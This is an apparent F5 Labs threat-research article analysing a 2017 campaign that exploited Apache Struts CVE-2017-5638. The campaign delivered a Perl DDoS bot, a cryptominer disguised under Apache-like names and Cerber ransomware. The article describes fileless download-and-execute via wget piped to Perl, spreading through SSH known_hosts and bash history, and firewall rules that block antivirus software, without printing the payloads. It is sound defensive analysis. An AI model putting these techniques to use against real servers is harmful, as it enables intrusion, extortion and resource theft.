From DDoS to Server Ransomware: Apache Struts 2 – CVE-2017-5638 Campaign
A common infection vector used by botnet creators is scanning the Internet for web vulnerabilities to exploit for malware or back doors. The advantage of hitting servers over personal consumer devices is the ability to leverage powerful hardware that is...
A common infection vector used by botnet creators is scanning the Internet for web vulnerabilities to exploit for malware or back doors. The advantage of hitting servers over personal consumer devices is the ability to leverage powerful hardware that is always online and has high bandwidth. Also, many servers do not have anti-virus solutions in place.
As soon as a zero-day remote code execution vulnerability is disclosed, it is common to see many scans in the wild. Some of these scans are researchers, but many of them are hostile exploit attempts. Following the disclosure of “Jakarta Multipart Parser” vulnerability in APACHE STRUTS 2 (CVE-2017-5638)1, F5 researchers observed around 10 different campaigns in the wild. One in particular caught our eye.
This campaign started on the 10th of March, 2017 a couple of days after the vulnerability was disclosed. While it looked similar to the other CVE-2017-5638 campaigns, the attack vector seemed to be a slight modification of the original public exploit2.
Figure 1: CVE-2017-5638 campaign
The exploit triggers the vulnerability via the Content-Type header value, which the attacker customized with shell commands to be executed if the server is vulnerable.
In the first days of this campaign, shell commands were observed to infect the machine with the “PowerBot” malware, which is written in PERL, and uses DDoS as its main functionality (also known as the PerlBot or Shellbot).
The typical infection tactic for the most commonly observed threat actors, who scan the Internet for web vulnerabilities as their attack strategy, has been to execute commands in several steps: downloading the malware from a remote server, setting it as executable (in the case of binary file), running the malware, and removing the initial infection file.
Conventionally, attack payloads have relied on already installed programs on the target server to download the malware, such as wget and curl. In this campaign, the attacker also leverages the less common “fetch” program as well as a special mode of the “wget”. By using the “wget –qO –“ options, the malware file is downloaded but is not actually written to a file on the disk. Instead, the content is redirected to the Perl interpreter for execution, minimizing the local detectable footprint.
Once the bot is in place, the infected server will connect to an IRC channel to retrieve commands from the botnet master, as shown in Figures 2 and 3. While joining the IRC, F5 researchers observed that the botnet has more than 2,500 victims at the time of this writing, including production servers. And this number is just for a single IRC channel.
Figure 2: IRC channel consists more than 2,500 bots phoning home
By randomly exploring some of the names and IP addresses of the infected hosts connected to the channel, we could find production servers and servers hosted on the AWS infrastructure.
Figure 3: Example of infected machines connected to the IRC channel
From DDoS to Crypto Currency Mining
Several days after the beginning of the observed campaign, F5 researchers started seeing a variation of the same campaign. The payload switched from Perl to Bash scripting, but this turned out to be just a spearhead to deploy two different types of malware. The spearhead exploit downloads and executes the same PERL bot.
Figure 4: Downloading and running PERL bot
However, this time, a “minerd” crypto coin mining program will be downloaded as well with all of its prerequisites. The attacker masquerades the malicious process and its configuration with names similar to Apache server, to make it look more innocent when the infected user will list all the running processes.
Figure 5: Downloading “minerd” and its configuration
The bot will then mine coins into several legitimate crypto pools, as shown in the configuration file in Figure 6.
Figure 6: “minerd” configuration file
These cryptocoin pools appear to be hosted in France under the “crypto-pool.fr” domain name, as shown in Figure 7.
Figure 7: Mining host in France in the Online SAS network
One of the more fascinating aspects of this malware was the creative technique that the spearhead exploit uses to propagate itself. It will search for all the remote IP addresses that the administrator of the server was connecting to on this server. It searches the SSH “known_hosts” file, which keeps the IP addresses and fingerprints of all the servers to which the administrator was connecting. It also scans the Bash history file for any IP addresses used within the SSH command. Once this list of IP addresses is compiled, the script tries to connect to them via SSH. If the configured authentication was set up to use a key file instead of a username and password, the malware will successfully deploy itself on the remote machine.
Figure 8: Malware propagating to other known servers
The ShellShock Connection
In general, threat actors love new zero-days as an opportunity to recycle their campaigns. One of the IP addresses in this campaign originates from Hong Kong, as shown in Figure 9; this address was known before to use the notorious ShellShock (CVE-2014-6271) to deliver similar payloads.
Figure 9: Attacking host in Hong Kong on the Wharf T&T network.
F5 researchers noted that the malware file names have stayed the same – “.mailer” and “a” as shown in Figure 10 and 11. However, the crypto mining pool and the account have been changed, as shown in Figure 12.
Delivering Linux DDoS malware by exploiting web vulnerabilities is commonly observed in the wild, and server ransomware seems to be one of the emerging trends starting from the last year.
The same attacker (surprisingly using the same IP address) behind the previously described Apache STRUTS campaign varied the campaign again during the week of March 20th. This time, the payload infected Windows machines with the “Cerber” ransomware.
The structure of the Jakarta Multipart parser exploit is identical to the attack that was used to deliver previous payloads. However, the current executed shell commands run the Windows BITSAdmin and ftp command line tools (which ship with every Windows server) to download and run the file “1.exe”, as shown in Figure 13.
Figure 13: APACHE STRUTS exploit delivering Windows ransomware
Once running, the malware encrypts the files and shows an image with a ransom message, as shown in Figure 14.
Figure 14: Ransom message once infected
As per the usual ransomware methods, the victim is given instructions on how to pay the ransom to get their files back, as shown in Figure 15.
Figure 15: Ransom payout instructions
F5 researchers analyzed this malware variant and found the author added a functionality of modifying Windows firewall rules to block communication from installed anti-virus software to the world, thus preventing updates and reporting. The specific rules are shown in Figure 16.
Figure 16: Ransomware blocks Windows Defender
To find the installed security products, the malware first runs WMI queries on the “AntiSpywareProduct” and “FirewallProduct” classes.
Figure 17: WMI queries to get the list of installed security products
Then it traverses through files and folders resulted from the query, and adds them to a firewall rule if they are executables.
Figure 18: Adding firewall rules to block security products communication
The Attackers’ Payday
The attackers running this campaign are using the same Bitcoin ID for a number of campaigns.
Figure 19: Bitcoin account located in malware configuration
This particular account has processed 84 bitcoins, which translates to roughly $86,000 USD at current market value (bitcoin value fluctuates slightly day to day). Since the Struts exploit has become publicly available, we observed 2.2 bitcoins going in and out of this wallet, worth roughly $2,300 USD.
Figure 20: Bitcoin transactions for the malware account
As we have seen in the past, it is amazing how fast existing threat actors using older web vulnerabilities in their campaigns can adapt to switch to newly released zero-days to deliver the same payloads. This gives them a new vulnerability window to exploit while the defenders install patches.
The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers. Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.
In this article we have analyzed only a single campaign targeting Apache STRUTS. There are around 10 additional ones, most of which are reconnaissance, while others deliver traditional Linux DDoS malware.
Check back with F5 Labs for updates on how these campaigns advance.
Join the Discussion
To comment, first sign in and opt in to Disqus.
Maxim is a Security Research Group Manager at F5 Networks, leading innovative research of web vulnerabilities and denial of service, evolving threats analysis, attack signature development and product hacking.
Julia Karpin is a senior malware researcher on the F5 security research team. She has been dealing with financial malware and its shenanigans for most of the current decade. Her main interest is Windows and Android malware, reverse engineering and automating every research aspect that can be automated. She has been a speaker at various security conferences, including REcon (@reconmtl), Virus Bulletin (@virusbtn), and OWASP Israel (@OWASPIL).